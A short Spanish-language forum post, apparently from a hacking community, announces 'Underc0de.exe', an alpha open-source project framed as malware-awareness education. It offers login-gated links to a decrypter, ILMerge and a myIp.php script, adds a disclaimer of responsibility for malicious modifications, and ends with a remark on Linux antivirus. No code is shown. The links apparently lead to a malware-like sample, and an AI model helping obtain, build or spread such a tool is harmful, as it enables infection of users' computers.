Link del Decryter You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Link de ILMergeYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Link de myIp.php You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Underc0de.exe es un proyecto de Open Source (GPL) con el fin de enseñar y promover la conciencia a los internautas sobre la problemática que curren
cuando un malware infecta a los ordenadores. No me responsabilizo de cualquier uso malintencionado que se haga del proyecto, así como de las modificaciones que los usuarios puedan realizar al código fuente de las aplicación, tampoco me hago responsable de las copias del proyecto que sean distribuidas a través de otras website o usuarios y que puedan haber sido modificadas con intenciones dudosas.


Ya que se enceuntra en la version alfa podria tener algunos errores. Pero por el momento lo he testeado en Win7 y XP (corre de maravilla).

Si lo que estas buscando un antivirus en Linux... probe Nod32 que me escaneo todas las particiones incluso en la que se encontraba Windows... pero un livecd que tenga un antivirus .. hasta ahora no he tenido la oportunidad de saber que existe uno.

link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos